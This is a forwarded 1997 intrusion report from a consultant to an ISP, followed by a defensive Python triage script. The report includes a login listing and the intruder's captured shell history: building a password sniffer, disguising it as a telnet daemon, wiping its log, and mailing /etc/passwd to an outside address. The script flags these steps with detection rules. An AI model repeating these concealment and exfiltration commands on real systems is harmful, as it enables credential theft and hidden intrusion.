System Attack & FBI (fwd)
Hi,
For your amusement.
Jim Choate
CyberTects
[email protected]
Forwarded message:
> From [email protected] Fri May 23 23:28:29 1997
> From: Jim Choate <[email protected]>
> Message-Id: <[email protected]>
> Subject: System Attack & FBI
> To: [email protected]
> Date: Fri, 23 May 1997 23:28:27 -0500 (CDT)
> Cc: [email protected]
> X-Mailer: ELM [version 2.4 PL23]
> Content-Type: text
> Content-Length: 7477
>
>
> Hi,
>
> As you will see below I have been tracking a waskelly wabbit for the last
> few weeks. I apologize for any interference with your access but I could
> not let it go without some sort of response.
>
> I *STRONGLY* advise you to change your password immediately.
>
> I do not expect anyone other than myself to have to talk with the FBI.
>
> If you have any questions please feel free to email me.
>
> Jim Choate
> CyberTects
> [email protected]
>
>
> Forwarded message:
>
> > From [email protected] Fri May 23 23:13:34 1997
> > Message-Id: <[email protected]>
> > X-Sender: [email protected]
> > X-Mailer: Windows Eudora Pro Version 3.0.1 (32)
> > Date: Fri, 23 May 1997 23:43:27 -0500
> > To: Jim Choate <[email protected]>
> > From: rberger <[email protected]>
> > Subject: Re: You have a hacker!
> > In-Reply-To: <[email protected]>
> > Mime-Version: 1.0
> > Content-Type: text/plain; charset="us-ascii"
> >
> > Thank you very much for sending us an e-mail and your logs. We are going
> > through our FTP logs at this time. Although initial results don't show
> > corresponding ftps at these times or files. Although a week ago we were
> > fighting a hacker using the same techniques as shown by the telnet
> > sessions. So we will be monitoring everything very closely here for a few
> > more days. Our next search will be the accounts logged in on these ports
> > at the times given. We have been working with the FBI, along with several
> > other ISPs in Dallas. If you capture any other logs please send them
> > again to [email protected]. If you don't hear anything from us in less
> > than 24 hours please re-send your e-mail message again to my domain
> > [email protected] just in case the root e-mail/logs are being monitored &
> > modified.
> >
> > Regards,
> >
> > Randall Berger, CEO
> > AppLink Corporation
> >
> >
> > At 10:43 PM 5/23/97 -0500, you wrote:
> > >
> > >Hello,
> > >
> > >
> > > My name is Jim Choate. I own and operate CyberTects, a small office/home
> > > office consultancy in Austin, TX. Over the last couple of weeks I have been
> > > tracking an intrusion on my system that has involved your systems. I would
> > > appreciate any help you can provide in resolving this issue.
> > >
> > > I believe a home account for the perp is [email protected]
> > >
> > > I will attach below the relevant files.
> > >
> > >
> > > Jim Choate
> > > CyberTects
> > > [email protected]
> > >
> > > --------------------------------------------------------------------------
> > >
> > > bbixler ttyp0 app42-73.applink Fri May 23 16:04 - 16:06 (00:01)
> > > bbixler ttyp0 app42-75.applink Fri May 23 00:21 - 00:28 (00:07)
> > > bbixler ttyp0 app42-90.applink Thu May 22 13:33 - 13:37 (00:03)
> > > bbixler ttyp0 app41-50.applink Wed May 21 20:01 - 20:31 (00:30)
> > > bbixler ttyp0 app41-47.applink Wed May 21 19:53 - 19:54 (00:00)
> > > bbixler ttyp0 app42-85.applink Wed May 21 18:46 - 19:00 (00:14)
> > > bbixler ttyp0 app42-75.applink Wed May 21 10:39 - 10:40 (00:00)
> > > bbixler ttyp0 app41-52.applink Sun May 18 23:04 - 23:11 (00:07)
> > > bbixler ttyp1 app42-78.applink Sat May 17 18:46 - 18:49 (00:02)
> > > bbixler ttyp1 app42-67.applink Sat May 17 01:22 - 01:26 (00:03)
> > > bbixler ftp fw6-10.ppp.iadfw Wed May 14 22:27 - 22:28 (00:01)
> > > bbixler ttyp1 app42-94.applink Tue May 13 16:12 - 16:18 (00:05)
> > > bbixler ttyp0 app42-85.applink Mon May 12 17:02 - 17:05 (00:02)
> > > bbixler ttyp0 app42-73.applink Sun May 11 12:29 - 12:36 (00:07)
> > > bbixler ttyp0 app42-71.applink Sat May 10 20:15 - 20:17 (00:01)
> > > bbixler ttyp0 app42-71.applink Sat May 10 19:40 - 19:50 (00:09)
> > > bbixler ttyp0 max2-800-04.eart Wed Feb 12 18:05 - 18:06 (00:00)
> > >
> > > wtmp begins Sun Feb 2 16:36
> > >
> > > --------------------------------------------------------------------------
> > >
> > > whoami
> > > ls
> > > mv perl-ex.sh /tmp/.bgg
> > > mkdir /tmp/.bg
> > > cd /tmp
> > > cd .bg
> > > ls
> > > lynx
> > > ls
> > > gcc linsniffer.c
> > > ls
> > > ps
> > > who
> > > w
> > > ps aux
> > > a.out &
> > > ls
> > > ifconfig
> > > /sbin/ifconfig
> > > ls
> > > tail -f tcp.log
> > > free
> > > ls
> > > cat tcp.log
> > > cd ..
> > > ls
> > > w
> > > cd
> > > cd ..
> > > ls
> > > cd ..
> > > cd /etc
> > > ls
> > > minicom
> > > cd ..
> > > ls
> > > cd cdrom.
> > > cd cdrom
> > > ls
> > > cd ..
> > > cd
> > > ls
> > > cd bin
> > > ls
> > > cd ..
> > > cd ..
> > > ls
> > > w
> > > finger
> > > cd Pphantom
> > > cat /etc/passwd | grep Pphantom
> > > cd phantom
> > > ls
> > > ls -al
> > > cat .bash_history
> > > cd /etc
> > > cat hosts
> > > ls
> > > cd /tmp
> > > cd .bg
> > > cat tcp.log
> > > exit
> > > cd .bg
> > > ls
> > > w
> > > ls
> > > ls -al
> > > cat tcp.log
> > > ifconfig
> > > /sbin/ifconfig
> > > ls
> > > exit
> > > mv x.sh /tmp
> > > cd .bg
> > > ls
> > > cd /tmp
> > > ls
> > > mv x.sh .bg
> > > cd .bg
> > > ls
> > > kill -9 14523
> > > ps aux
> > > mv a.out in.telnetd
> > > ls
> > > rm tcp.log
> > > ./in.telnetd &
> > > exit
> > > pico tcp.log
> > > ls
> > > ps aux
> > > kill -9 16282
> > > ls
> > > ./in.telnetd &
> > > exit
> > > cat /dev/null > tcp.log
> > > w
> > > exit
> > > pico tcp.log
> > > ls
> > > ls -al
> > > cd /etc
> > > cat passwd
> > > mail [email protected] < passwd
> > > exit
> > > w
> > > ls -al
> > > pico tcp.log
> > > echo /dev/null > tcp.log
> > > ls -al
> > > ps aux
> > > quit
> > > exit
> > > id
> > > w
> > > ftp
> > > ls
> > > mkdir /home/ftp/.tmp
> > > mkdir /home/ftp/.tmp/.sub
> > > mv linsniff /home/ftp/.tmp/.sub/
> > > cd /home/ftp/.tmp/.sub/
> > > mv linsniff in.te1netd
> > > ls -l
> > > chmod 755 in.te1netd
> > > in.te1netd &
> > > ps
> > > ps aux
> > > killall in.te1netd
> > > ls
> > > ls -a
> > > ls -l
> > > in.te1netd &
> > > /home/ftp/.tmp/.sub/in.te1netd
> > > /home/ftp/.tmp/.sub/in.te1netd
> > > ls -s
> > > rm in.te1netd
> > > cd
> > > ls
> > > mv hello .h311o
> > > ftp
> > > ls
> > > mv linsniffer.c /home/ftp/.tmp/.sub/
> > > cd /home/ftp/.tmp/.sub
> > > ls
> > > cc linsniffer.c
> > > mv a.out in.te1netd
> > > chmod 755 in.te1netd
> > > ls
> > > rm linsniffer.c
> > > in.te1netd &
> > > exit
> > > cd ..
> > > mv apache.tgz .bg
> > > cd .bg
> > > ls
> > > tar xfvz apache.tgz
> > > cd apache_1.2b10/
> > > ls
> > > cd src
> > > make
> > > ls
> > > ./Configure
> > > make
> > > ls
> > > cd ..
> > > ls
> > > cd cgi-bin/
> > > ls
> > > cd ..
> > > ls
> > > cd ..
> > > ls
> > > w
> > > rm -rf apache*
> > > lynx
> > > ls
> > > tar xfvz apache_1.1.3.tar.gz
> > > cd apache_1.1.3
> > > ls
> > > cd src
> > > ls
> > > ./Configure
> > > make
> > > ls
> > > cd ..
> > > ls
> > > cd ..
> > > ls
> > > rm -rf apache_1.1.3
> > > ls
> > > rm -rf apache_1.1.3.tar.gz
> > > w
> > > exit
> > > kill -9 14551
> > > ls
> > > ls -al
> > > cd ..
> > > ls
> > > cd /home
> > > ls
> > > cd ftp
> > > ls -al
> > > cd .tm[p
> > > cd .tmp/
> > > ls
> > > ls -al
> > > cd .sub/
> > > ls
> > > rm *
> > > cd ..
> > > cd ..
> > > rm -rf .tmp/
> > > ls
> > > cd
> > > ls
> > > cd /root
> > > ls
> > > cd ssz
> > > ls
> > > cd ..
> > > ls
> > > cd pgp
> > > ls
> > > cd ..
> > > cd etc
> > > ls
> > > cd ..
> > > ls
> > > cd /
> > > ls
> > > exit
> > > id
> > > crontab -e
> > > ls
> > > vi .sub
> > > crontab -e
> > > ls
> > > cat /home/ftp/.tmp/.sub/tcp.log
> > > ps aux
> > > who
> > > cd /home/ftp
> > > ls -a
> > > mkdir .tmp/.sub
> > > mkdir .tmp
> > > cd .tmp
> > > exit
> > > cd
> > > ls
> > > cd /root
> > > ls
> > > cd khg-0.5/
> > > ls
> > > cd ..
> > > cat .bash_history
> > > ls
> > > cd /etc
> > > ls
> > > cat hosts
> > > exit
> > >
> > >
> > >
> > >
> >
>
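The two artefacts in the forwarded report are a `last`-style login listing and the intruder's captured shell history, which shows a sniffer being compiled, renamed to a daemon name (`in.telnetd`, and the look-alike `in.te1netd` with a digit one for the letter l), started from a hidden directory, and its `tcp.log` repeatedly truncated. The following triage script is an added example, not code from the original post or from either party: it summarizes the login listing by origin network and runs a few detection rules over the history to surface exactly those steps. The rule names, the daemon list, and the homoglyph table are this example's own assumptions; the sample lines are a condensed subset copied from the report so the output can be checked against it.

```python
"""Triage helpers for the two artefacts in the report above: the `last`-style
login listing and the captured shell history. Added example; rules and names
are this example's own, sample lines are copied from the report."""
import re
from collections import Counter
from dataclasses import dataclass

# Daemon names an intruder's binary may be renamed to so it blends into `ps`.
# (Assumed list for this example.)
KNOWN_DAEMONS = {"in.telnetd", "in.ftpd", "inetd", "syslogd", "httpd"}
# Digit-for-letter swaps used to forge look-alike names (in.te1netd).
HOMOGLYPHS = str.maketrans({"1": "l", "0": "o"})

# Subset of the wtmp listing from the report.
SAMPLE_LAST = """\
bbixler ttyp0 app42-73.applink Fri May 23 16:04 - 16:06 (00:01)
bbixler ttyp0 app42-75.applink Fri May 23 00:21 - 00:28 (00:07)
bbixler ftp fw6-10.ppp.iadfw Wed May 14 22:27 - 22:28 (00:01)
bbixler ttyp1 app42-94.applink Tue May 13 16:12 - 16:18 (00:05)
bbixler ttyp0 max2-800-04.eart Wed Feb 12 18:05 - 18:06 (00:00)
""".splitlines()

# Condensed subset of the captured shell history from the report.
SAMPLE_HISTORY = """\
whoami
mv perl-ex.sh /tmp/.bgg
mkdir /tmp/.bg
cd /tmp/.bg
gcc linsniffer.c
a.out &
tail -f tcp.log
mv a.out in.telnetd
rm tcp.log
./in.telnetd &
pico tcp.log
cat /dev/null > tcp.log
mail [email protected] < passwd
mkdir /home/ftp/.tmp/.sub
mv linsniff in.te1netd
chmod 755 in.te1netd
in.te1netd &
echo /dev/null > tcp.log
""".splitlines()

LAST_LINE = re.compile(
    r"^(?P<user>\S+)\s+(?P<tty>\S+)\s+(?P<host>\S+)\s+"
    r"(?P<start>\w{3} \w{3}\s+\d+ \d\d:\d\d) - (?P<end>\d\d:\d\d) "
    r"\((?P<h>\d\d):(?P<m>\d\d)\)$"
)


def sessions_by_origin(last_lines):
    """Count sessions per origin network; the last label of the (truncated)
    hostname, e.g. 'applink', stands in for the network name."""
    counts = Counter()
    for line in last_lines:
        m = LAST_LINE.match(line.strip())
        if m:
            counts[m.group("host").rsplit(".", 1)[-1]] += 1
    return counts


@dataclass(frozen=True)
class Finding:
    line_no: int
    rule: str
    command: str


# Regex rules for the staging and log-tampering steps visible in the history.
RULES = [
    ("hidden-directory-created", re.compile(r"^mkdir\s+((/tmp|/home/ftp)\S*/\.|\.)")),
    ("sniffer-build", re.compile(r"^(gcc|cc)\s+\S*sniff")),
    ("log-truncation", re.compile(r">\s*\S*\.log$|^rm\s+(-\S+\s+)?\S*\.log$")),
    ("log-edit", re.compile(r"^(pico|vi|vim|ed)\s+\S*\.log$")),
    ("passwd-exfil", re.compile(r"^mail\b.*<\s*(/etc/)?passwd$")),
]


def lookalike_daemon(path):
    """Return the daemon name a file imitates, or None. Catches both exact
    reuse of a daemon name and homoglyph variants of it."""
    base = path.rsplit("/", 1)[-1]
    canon = base.translate(HOMOGLYPHS)
    return canon if canon in KNOWN_DAEMONS else None


def scan_history(history_lines):
    """Apply the regex rules plus the daemon-name checks to each command."""
    findings = []
    for n, raw in enumerate(history_lines, 1):
        cmd = raw.strip()
        for rule, rx in RULES:
            if rx.search(cmd):
                findings.append(Finding(n, rule, cmd))
        mv = re.match(r"^mv\s+\S+\s+(\S+)$", cmd)
        if mv and lookalike_daemon(mv.group(1)):
            findings.append(Finding(n, "rename-to-daemon-name", cmd))
        # Real daemons are started by init/inetd, not backgrounded from a shell.
        bg = re.match(r"^(\S+)\s+&$", cmd)
        if bg and lookalike_daemon(bg.group(1)):
            findings.append(Finding(n, "daemon-launched-from-shell", cmd))
    return findings


def rule_counts(findings):
    return Counter(f.rule for f in findings)


if __name__ == "__main__":
    print(dict(sessions_by_origin(SAMPLE_LAST)))
    for f in scan_history(SAMPLE_HISTORY):
        print(f"{f.line_no:>3} {f.rule:<28} {f.command}")
```

On the sample history every tampering step in the report is flagged: the hidden directories under `/tmp` and `/home/ftp`, the sniffer compile, both renames to a daemon name, both launches of the fake daemon, the three truncations of `tcp.log`, the editor session on it, and the mailing of `passwd`. The homoglyph table is deliberately small; a production version would canonicalize against the real daemon inventory of the host rather than a fixed list.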